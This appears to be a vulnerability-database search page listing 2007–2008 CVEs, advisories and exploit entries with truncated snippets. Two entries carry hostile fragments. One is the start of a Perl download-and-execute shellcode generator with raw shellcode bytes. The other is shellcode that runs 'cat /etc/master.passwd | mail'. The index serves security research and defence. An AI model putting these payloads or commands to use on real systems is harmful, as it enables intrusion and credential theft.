
6692 matches found

Cvelist
added 2008/05/07 11:0 p.m., 11 views

CVE-2008-2110

Unrestricted file upload vulnerability in qtofm.php in QTOFileManager 1.0 allows remote attackers to execute arbitrary PHP code by uploading a file with an executable extension, then accessing it via a direct request...

7.6 AI score, 0.03011 EPSS
Exploits 1, References 5

Cvelist
added 2008/04/27 9:0 p.m., 9 views

CVE-2008-1988

Unrestricted file upload vulnerability in the fileupload function in core/misc.class.php in EncapsGallery 2.0.2 allows remote authenticated administrators to upload and execute arbitrary PHP files by uploading a file with an executable extension, then accessing it via a direct request to the file...

6.8 AI score, 0.00395 EPSS
Exploits 0, References 3

CERT
added 2008/03/28 12:0 a.m., 10 views

Nik Software Sharpener Pro vulnerable to privilege escalation

Overview The Nik Software Sharpener Pro installs files with insecure permissions, which may allow a local attacker to elevate privileges. Description Nik Software Sharpener Pro is an Adobe Photoshop plug-in that provides image sharpening capabilities. The Nik Software Sharpener Pro installer sets...

6.7 AI score
Exploits 0, References 1

Packet Storm
added 2008/03/17 12:0 a.m., 34 views

xnview-overflow.txt

-------- XNview -------- Informations : Version : 1.92.1 Website : http://www.xnview.com/ Problem : Long Filename Overflow Description: XnView is an efficient multimedia viewer, browser, and converter. It supports more than 400 graphic file formats PNG, JPEG, TARGA, TIFF, GIF, BMP, and more...

7.4 AI score
Exploits 0

seebug.org
added 2008/03/15 12:0 a.m., 27 views

win32 Download and Execute Shellcode Generator (browsers edition)

No description provided by source. !/usr/bin/perl $loadingurl=$ARGV0; chomp $loadingurl; my @buffer; if $loadingurl eq "" $sco = 'ERROR!!! Enter url to remote exe.'; buffergen$sco; print @buffer; exit; $c= generatechar0; $sco= "\xE8\x56\x00\x00\x00\x53\x55\x56\x57\x8B\x6C\x24\x18\x8B\x45"...

7.1 AI score
Exploits 0

Cvelist
added 2008/03/10 5:0 p.m., 16 views

CVE-2008-1264

The Linksys WRT54G router has "admin" as its default FTP password, which allows remote attackers to access sensitive files including nvram.cfg, a file that lists all HTML documents, and an ELF executable file...

6.5 AI score, 0.00522 EPSS
Exploits 0, References 3

NVD
added 2008/02/19 12:0 a.m., 12 views

CVE-2008-0805

Unrestricted file upload vulnerability in image.php in PHPizabi 0.848b C1 HFP1 allows remote attackers to execute arbitrary code by uploading a file with an executable extension from the event page, then accessing it via a direct request to the file in system/cache/pictures...

9.3 CVSS, 7.6 AI score, 0.10148 EPSS
Exploits 0, References 3

Prion
added 2008/02/05 3:0 a.m., 11 views

Design/Logic Flaw

Geert Moernaut LSrunasE and Supercrypt use an encryption key composed of an SHA1 hash of a fixed string embedded in the executable file, which makes it easier for local users to obtain this key without reverse engineering...

2.1 CVSS, 6.7 AI score, 0.0008 EPSS
Exploits 0, References 3

CERT
added 2008/01/25 12:0 a.m., 24 views

GE Fanuc Proficy Information Portal allows arbitrary file upload and execution

Overview GE Fanuc Proficy Information Portal allows authenticated users to upload arbitrary files. An attacker could upload an executable server-side script e.g., an .asp shell on a Microsoft Internet Information Server platform and execute arbitrary commands with the privileges of the web server...

7.5 CVSS, 6.7 AI score, 0.35218 EPSS
Exploits 6, References 3

OpenVAS
added 2008/01/17 12:0 a.m., 21 views

Debian Security Advisory DSA 637-1 (exim-tls)

The remote host is missing an update to exim-tls announced via advisory DSA 637-1. OpenVAS Vulnerability Test $Id: deb6371.nasl 6616 2017-07-07 12:10:49Z cfischer $ Description: Auto-generated from advisory DSA 637-1 Authors: Thomas Reinke Copyright: Copyright c 2007 E-Soft Inc...

7.2 CVSS, 0.8 AI score, 0.02817 EPSS
Exploits 1

OpenVAS
added 2008/01/17 12:0 a.m., 26 views

Debian Security Advisory DSA 947-2 (clamav)

The remote host is missing an update to clamav announced via advisory DSA 947-2. A heap overflow has been discovered in ClamAV, a virus scanner, which could allow an attacker to execute arbitrary code by sending a carefully crafted UPX-encoded executable to a system running ClamAV. In addition,...

7.5 CVSS, 0.2 AI score, 0.27999 EPSS
Exploits 0

OpenVAS
added 2008/01/17 12:0 a.m., 22 views

Debian Security Advisory DSA 159-2 (python)

The remote host is missing an update to python announced via advisory DSA 159-2. OpenVAS Vulnerability Test $Id: deb1592.nasl 6616 2017-07-07 12:10:49Z cfischer $ Description: Auto-generated from advisory DSA 159-2 Authors: Thomas Reinke Copyright: Copyright c 2007 E-Soft Inc...

4.6 CVSS, 6.6 AI score, 0.00144 EPSS
Exploits 0

OpenVAS
added 2008/01/17 12:0 a.m., 17 views

Debian Security Advisory DSA 193-1 (kdenetwork)

The remote host is missing an update to kdenetwork announced via advisory DSA 193-1. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holder(s). SPDX-License-Identifier: GPL-2.0-only ifdescripti...

7.2 CVSS, 7 AI score, 0.00075 EPSS
Exploits 0, References 2

Tenable Nessus
added 2008/01/14 12:0 a.m., 12 views

Fedora 7 : qimageblitz-0.0.4-0.3.svn706674.fc7 (2008-0463)

This update fixes qimageblitz not to needlessly require an executable stack. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without...

5.4 AI score
Exploits 0, References 2

securityvulns
added 2008/01/06 12:0 a.m., 24 views

Novell ZENworks Endpoint Security Management security client privilege escalation

Application launch with SYSTEM privileges by relative path, temporary executable files creation in user-controlled directory...

2.9 AI score
Exploits 0, References 1, Affected Software 1

seebug.org
added 2007/12/20 12:0 a.m., 36 views

Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit

No description provided by source. / Copyright C 2007-2008 Subreption LLC. All rights reserved. Visit http://blog.subreption.com for exploit development notes. References: CVE-2007-3876 http://docs.info.apple.com/article.html?artnum=307179...

6.6 CVSS, 0.3 AI score, 0.00226 EPSS
Exploits 5

seebug.org
added 2007/12/20 12:0 a.m., 13 views

bsd/x86 cat /etc/master.passwd | mail [email] 92 bytes

No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 92 bytes. execve/bin/sh -c "/bin/cat /etc/master.passwd|mail root@localhost"; you can replace the command with whatever you like. / char shellcode=...

7.1 AI score
Exploits 0

Packet Storm
added 2007/12/20 12:0 a.m., 36 views

applesmb-overflow.txt

/ Copyright C 2007-2008 Subreption LLC. All rights reserved. Visit http://blog.subreption.com for exploit development notes. References: CVE-2007-3876 http://docs.info.apple.com/article.html?artnum=307179 http://seclists.org/fulldisclosure/2007/Dec/0445.html...

6.6 CVSS, 0.00226 EPSS
Exploits 5

0day.today
added 2007/12/19 12:0 a.m., 22 views

Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit

Exploit for macOS platform in category local exploits ============================================================== Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit ============================================================== / Copyright C 2007-2008 Subreption LLC. All rights...

6.8 AI score, 0.00226 EPSS
Exploits 5

exploitpack
added 2007/12/19 12:0 a.m., 29 views

Apple Mac OSX - mount_smbfs Local Stack Buffer Overflow

Apple Mac OSX - mount_smbfs Local Stack Buffer Overflow / Copyright C 2007-2008 Subreption LLC. All rights reserved. Visit http://blog.subreption.com for exploit development notes. References: CVE-2007-3876 http://docs.info.apple.com/article.html?artnum=307179...

6.6 CVSS, 0.5 AI score, 0.00226 EPSS
Exploits 5